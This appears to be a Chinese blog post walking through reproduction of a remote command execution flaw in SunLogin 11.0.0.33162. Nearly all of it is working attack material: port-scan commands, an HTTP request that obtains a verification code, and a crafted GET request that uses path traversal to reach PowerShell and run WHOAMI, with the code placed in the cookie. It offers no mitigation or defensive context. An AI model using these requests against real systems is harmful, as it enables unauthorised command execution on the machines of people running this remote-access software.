复现版本
SunLogin 11.0.0.33162
复现过程
1. 端口扫描
使用 nmap 进行端口扫描:
<code>nmap -A -p- -T4 -vv 192.168.43.85</code>
或者使用专用工具进行扫描:
<code>./xrkRce -h 192.168.43.85 -p 1-65535 -t scan</code>
2. 漏洞利用
HTTP 访问
- 获取验证码:
<code>POST /cgi-bin/rpc HTTP/1.1 Host: 192.168.43.85:49164 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/x-www-form-urlencoded Content-Length: 19 action=verify-hara</code>
- 拼接执行命令
将控制码拼接到 COOKIE 上,格式如下:Cookie:CID=控制码
。
例如,拼接执行 ping
命令:
<code>GET /check?cmd=ping../../../../../../../../../windows/system32/WindowsPowerShell/v1.0/powershell.exe+WHOAMI HTTP/1.1 Host: 192.168.43.85:49164 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Cookie: CID=6onb943qKJoXQGAmr1BKArugFlO9949g Upgrade-Insecure-Requests: 1</code>
通过以上步骤,完成对 SunLogin 11.0.0.33162 版本的漏洞复现及利用。
© 版权声明
THE END
暂无评论内容